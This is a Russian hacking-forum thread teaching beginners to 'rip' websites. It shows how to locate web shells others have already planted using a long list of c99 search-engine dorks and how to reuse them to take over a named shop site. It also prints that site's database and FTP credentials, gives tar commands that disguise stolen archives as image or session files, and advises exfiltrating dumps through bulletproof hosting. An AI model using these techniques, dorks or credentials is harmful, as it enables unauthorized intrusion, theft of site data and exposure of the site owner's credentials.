Как делать РИП сайта. Новичкам на заметку.

Тема в разделе "Взлом и уязвимости", создана пользователем +Vampir+, 26 фев 2017.

  1. +Vampir+

    +Vampir+

    Сообщения:
    96
    Баллы:
    6
    Очень часто все более-менее толковые компьютерщики задаются навязчивой идеей что нибудь поломать или кому нибудь бяку сделать.

    Ну и возникают вопросы:
    • Как ?
    • Где почитать?
    • Что такое MySQL и PHP ?
    Ну и остальное, что на взлом может повлиять.

    Поэтому сделаем маленький экскурс в хакинг сайтов, и их копирование на свой компьютер для последующего ознакомления.

    Сегодня желания особого растекаться мыслью по древу нет, по этому расскажу пару самых примитивных примеров. С чего так сказать начинал я

    Пример №1

    Исходный материал:

    • Человек любознательный, без особых извилин в PHP, MySQL и XSS.
    • Правильные и прямые руки
    • Поисковые системы Google.com, Yandex.ru
    Цель:
    • Получить доступ к сайту
    • Скопировать базу данных исодержимое сайта на свой ПК
    **************************************

    Выполнение практического занятия:
    1) Качаем shell (Google в помощь их масса)

    2) Распаковываем архив и заливаем первый попавшийся шелл на свой хост.
    3) Заходим на свой шелл изнакомимся с его внешним видом. В первую очередь нам нужны "особенные" фразы, которые помогут отделить данные шеллы в инете от других скриптов и страниц.
    4) Мне почему то нравится shellC2007Shell, это из разряда С99Shell.Поэтому заходим в Google и пишем фразу "c2007shell v. 1.0 pre-release build", либо другую которая связанна с шеллом.
    5) Видим много (или мало) результатов поиска. Это зависит от особенной фразы.
    6) Идем перебором по каждой найденной ссылке. И смотрим на работоспособность шеллов, который кто то для "нас" любезно залил.
    7) Если с Google хороших ссылок не нашли. Не вешаем нос, Гардемарины. Идем в гости к Yandex, Yahoo, MSN и др. поисковым системам, которые сможем вспомнить. Даже при самых плохих раскладах Вы можете найти не менее 1-5 хороших шеллов для тренировки.

    Для практического занятия я уже залил один шелл. Будем считать, что мы его нашли поиском:
    http://www.saleua.com/images/2007x.php

    8) Заглядываем внутрь сайта и понимаем, что это какой то магазин. Побегав по всяким папкам и файлам находим следующие данные:
    configure.php
    Код:
    // define our database connection
    define('DB_SERVER', 'billing.mycard.net.ua'); // eg, localhost - should not be empty for productive servers
    define('DB_SERVER_USERNAME', 'saleua');
    define('DB_SERVER_PASSWORD', 'skirda');
    define('DB_DATABASE', 'saleua');
    define('USE_PCONNECT', 'false'); // use persistent connections?
    define('STORE_SESSIONS', 'mysql'); // leave empty '' for default handler or set to 'mysql'


    9) Опачки Мы нашли данные к базе MySQL. Делаем её BackUp с помощью скрипта Sypex Dumper Lite. Находим скрипт в аттаче.
    10) Теперь нужно подумать надкопированием файлов на свой ПК. Начинаем искать решение от простого к сложному. Самый простой способ - слить файлы по FTP Возможно он не самый простой для продвинутых, но для новичков - проще пареной репы.
    11) Как же добыть пароль на FTP ??? Пробуем подставлять пользователей и пароли, которые нам уже известны. Около 70% веб-мастеров делают одинаковые пароли на все что можно. Начиная от базы данных, заканчивая админкой и доступом FTP.
    12) Блин, вот какая шара то.... Опять повезло.
    ftp://www.saleua.com
    user: saleu
    password:
    skirda

    Прямо как пользователь и пароль кMySQL

    13) Льем базу "дампером", а файлы по FTP.
    14) Рип у нас готов...

    Пример №2

    Исходный материал:

    • Человек любознательный, ссредними или хорошими извилинами в PHP, MySQL и XSS.
    • Правильные и качественно прямые руки
    • Поисковые системы Google.com, Yandex.ru
    Цель:
    • Получить доступ к сайту
    • Скопировать базу данных и содержимое сайта на свой ПК

    Краткая инструкция по эксплуатации:
    1) Заходим на antichat.ru
    2) Качаем видео и внимательно его смотрим.
    3) Разыскиваем объект (уязвимый движок или скрипт) для изучения.
    4) Внимательно его рассматриваем и запоминаем "особенные" фразы.
    5) Пользуясь услугами поисковых систем находим уязвимые скрипты.
    6) Еще раз смотрим видео и пытаемся повторить аналогичное.
    7) Если получилось - заливаем шелл.
    8) Дальше Вы все знаете..


    P.S.
    Данная инструкция носит чисто информативных характер и ни в коем случае не может применяться для взлома В противном случае Вы можете получить по шапке.
    P.S.S. Не проводите деструктивных действий с www.saleua.com. Хоть сайт и не мой (мне его не жалко), но других примеров делать не буду. Если кто то изменит - другие будут только текстами довольствоваться, без практики...
    P.S.S.S.
    Если вдруг заглянут в этот топик хорошие рипперы, то они могут побегать по хосту и найти еще парочку объектов для рипования по адресу/usr/home/
  2. +Vampir+

    +Vampir+

    Сообщения:
    96
    Баллы:
    6
    в первом сообщении как пример взят c99, то вот вам поисковые фразы для поисковиков:
    1. раз в первом сообщении как пример взят c99, то вот вам поисковые фразы для поисковиков:

      Код:
      inurl:"c99.php"
      inurl:c99.php uid=0(root)
      allinurl:c99.php
      inurl:"c99.php"
      inurl:"c99.php"
      inurl:"/c99.php" intitle:"C99shell"
      inurl:"/c99.php" intitle:"C99shell"
      inurl:"/c99.php" intitle:"C99shell"
      C99Shell v. 1.0 pre-release build #5
      inurl:c99.php
      inurl:c99.php
      --[ c99shell v. 1.0 pre-release build #16
      c99shell linux infong
      c99shell linux infong
      C99Shell v. 1.0 pre-release build
      !C99Shell v. 1.0 beta!
      Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
      !c99shell v. 1+Safe-mode: OFF (not secure)
      "C99Shell v. 1.0 pre-release build "
      inurl:c99.php
      intitle:C99Shell v. 1.0 pre-release +uname
      "Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
      Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
      intitle:!C99Shell v. 1.0 pre-release build #16! root
      !C99Shell v. 1.0 pre-release build #5!
      inurl:"c99.php"
      C99Shell v. 1.0 pre-release build #16!
      c99shell v. 1.0 pre-release build #16
      intitle:c99shell intext:uname
      allintext:C99Shell v. 1.0 pre-release build #12
      c99shell v. 1.0 pre-release build #16
      --[ c99shell v. 1.0 pre-release build #15 | Powered by ]--
      allinurl: "c99.php"
      allinurl: "c99.php"
      Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
      "c99shell v 1.0"
      ftp apache inurl:c99.php
      c99shell+v.+1.0 16
      C99Shell v. 1.0 pre-release build #16 download
      intitle:c99shell "Software: Apache"
      allinurl: c99.php
      allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
      powered by Captain Crunch Security Team
      powered by Captain Crunch Security Team
      !C99Shell v. 1.0 pre-release build #5!
      c99shell v. 1.0 release security
      c99shell v. 1.0 pre-release build
      inurl:c99.php
      c99shell [file on secure ok ]?
      C99Shell v. 1.3
      Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
      inurl:c99.php uid=0(root)
      powered by Captain Crunch Security Team
      C99Shell v. 1.0 pre-release build #16
      c99shell[on file]ok
      c99shell[file on ]ok
      Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
      inurl:c99.php
      "C99Shell v. 1.0 pre"
      =C99Shell v. 1.0 pre-release
      Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
      c99shell v. pre-release build
      inurl:c99.php c99 shell
      inurl:c99.php c99 shell
      powered by Captain Crunch Security Team
      inurl:c99.php
      inurl:c99.php
      !C99Shell v. 1.0 pre-release build #5!
      intitle:"c99shell" Linux infong 2.4
      C99Shell v. 1.0 beta !
      C99Shell v. 1.0 pre-release build #
      inurl:"c99.php"
      allintext:C99Shell v. 1.0 pre-release build #12
      "C99Shell v. 1.0 pre"
      powered by Captain Crunch Security Team
      Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
      inurl:/c99.php?
      allinurl:c99.php
      intitle:C99Shell pre-release
      inurl:"c99.php"
      powered by Captain Crunch Security Team
      inurl:c99.php
      C99Shell v. 1.0 pre-release build #16!
      allinurl:c99.php
      C99Shell v. 1.0 pre-release build #16 administrator
      powered by Captain Crunch Security Team
      powered by Captain Crunch Security Team
      C99Shell v. 1.0 pre-release build #12
      c99shell v.1.0
      allinurl:c99.php
      "c99shell v. 1.0 pre-release build"
      "c99shell v. 1.0 "
      ok c99.php
      Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
      c99shell v. 1.0 pre-release build #16 |
      !C99Shell v. 1.0 pre-release build #5!
      !C99Shell v. 1.0 pre-release build #5!
      allinurl:/c99.php
      powered by Captain Crunch Security Team
      inurl:c99.php
      Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
      inurl:c99.php
      powered by Captain Crunch Security Team
      inurl:c99.php
      C99Shell v. 1.0 pre-release
      inurl:c99.php
      inurl:"c99.php"
      allinurl:"c99.php"
      Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
      powered by Captain Crunch Security Team
      Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
      Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout"
      C99Shell v. 1.0 pre-release build #16 software apache
      Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
      "c99shell v 1.0"
      inurl:"c99.php"
      C99Shell v. 1.0 pre-release build #16!
      "c99shell v. 1.0 pre-release"
      c99shell v. 1.0 pre-release build #5
      Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
      Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
      !C99Shell v. 1.0 pre-release build #16!
      inurl:c99.php
      intitle:C99Shell v. 1.0 pre-release +uname
      inurl:c99.php
      c99shell v. 1.0
      allinurl: c99.php
      --[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--
      inurl:"/c99.php"
      c99shell +uname
      c99shell php + uname
      c99shell php + uname
      --[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--
      allinurl:c99.php
      !C99Shell v. 1.0 pre-release build #5!
      C99Shell v.1.0 pre-release
      Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
      inurl:c99.php
      "Encoder Tools Proc. FTP brute"
      c99shell v. 1.0 pre
      inurl:c99.php
  3. +Vampir+

    +Vampir+

    Сообщения:
    96
    Баллы:
    6
    команды используемые на шелле

    at - указание времени когда выполняется команда
    chown - смена хозяина файла
    batch - выполнить команду во время загрузки
    telnet - клиент телнет
    ftp - клиент фтп
    rmdir - удалить каталог
    finger/who/users - вывести список работающих в системе.
    gcc - компилятор C
    ftpwho - фингер для фтп
    mv - переместить файл
    kill - прекратить процесс
    cat - текстовой редактор
    ls - просмотр каталога
    chmod - смена привилегий файлового доступа
    rm - удалить файл
    id - просмотр прав, т.е.uid и gid
    mail - работа с мылом
    cd - сменить каталог
    cron - демон команд at и batch
    logname - получение имени регистрации
    cp - копирование чего либо.
    uname -a - всё о версии системы.
    crontab - задать резервы времени между запусками прог.
    ps - ознакомление со списком процессов.
    pwcheck - просмотр дефолтового файла пароля.
    umask - маска для определённого файла.
    su - программа su
    sleep - преостановить процесс.
    passwd - работа с паролем.
    news - отображение usenet
    write - мессага текущему юзеру.
    uux - выполнить комманды на remote компе
    nslookup - сводки гидромедцентра о IP
    uucp - копирование файл с/на remote комп
    uuname - список хостов UUCP
    more - вывод текстовика в постраничном режиме
    greg - поиск строки в фйле по заданному ключу
    greg -i - то же,без учёта регистра.
    uuencode - содание текстовой версии двоичного файла( для мыла)
    uudecode – создание двоичной версии текстового файла
    tar - создание архивов файлов.
    uncompress - получение исходного из сжатого файла.
    uptime – время запуска машины.
    ping - %) читай man.
  4. +Vampir+

    +Vampir+

    Сообщения:
    96
    Баллы:
    6
    Упаковка файлов:
    размер папки сайта: du -hsx/home/user_name/www/
    упаковка указаной папки:
    к примеру в дире с картинками упаковываем файл под названия картинок:
    tar cjf avatar_1744.jpg/home/user_name/www/
    в /tmp для безпаливности:
    tar cjfsess_f954433701e7a425477209c1e25bd86d /home/user_name/www/
    в данных случаях при скачивании переименовываем в *.tar.bz2
    в винде:
    к примеру хостинг 1gb:
    т.к. у них на сервантах стоит чтото типа cygwin - можно выполнять никсовые команды, типа du, cat, ls, uname и т.д., но имеется Rar архиватор, так что выполняем команду:
    Rar.exe a -r имя_архива.разрешениеd:\hst\путь\http\
    либо закачиваем к примеру архиватор 7-zip в папку temp (прав вполне хватит, и даже на запуск софта) и выполняем:
    7z a -tzip имя_архива.разрешениеd:\www\http\
    SafeMode:
    В никсе и винде обычно легко обойти при помощи cgi скриптов, главное чтоб хватило прав на запись в папку/cgi-bin/ и т.д., но если нет возможности на запись, то бывают такие случаи, что cgi скрипт можно выполнить в любой дире - inurl:index.plк приеру (знаю несколько хостингов, которые этим страдают и после обхода SafeMode с правами nobody - есть возможность читать диры других юзеров:
    38628566 drwxr-x--- 18 user nobody 4096 Mar 8 16:52 .
    ). Если не получается обойти (чтоб упаковать командами), то юзаемalfaungzipper.com который позволит упаковывать сайт, несмотря наSafeMode :ay:
    Загрузка рипа/дампа:

    да бы не палить свой IP или не выкачивать большой объём через носок или скорость с носка малая, то я предпочитаю юзать Rapidshare Remote-Upload + скрипты, установленые на абузоустойчивом хостинге, либо накрайняк с рапиды сливаю через servage.net (к примеру т.к. у них канал хороший), а затем прогоняю через другие хостинги и/или снова на Rapidshare.
  5. abs0lut3

    abs0lut3

    Сообщения:
    3
    Баллы:
    1
    Жесть, есть варики и попроще
  6. +Vampir+

    +Vampir+

    Сообщения:
    96
    Баллы:
    6
    Например...?
  7. ДедМакар

    ДедМакар

    Сообщения:
    3
    Баллы:
    1
    Например "Тырнуть на кнопку" и всё само сломается
  8. Chestniy

    Chestniy

    Сообщения:
    133
    Баллы:
    16
    Не понял ничего абсолютно, какой-то набор слов написан в теме, без обид.
    Что за shell? Откуда его скачать? Если скачал то что с ним делать? Куда загрузить, что вписать что вообще с ним делать!?
  9. LoranWodda

    LoranWodda

    Сообщения:
    23
    Баллы:
    1
    Shell- php-вирус\троян\бэкдор. Его можно залить через SQL-инекцию, или вставить php-код в картинку и проинклюдить её при помощи LFI. Гугли вообщем

Поделиться этой страницей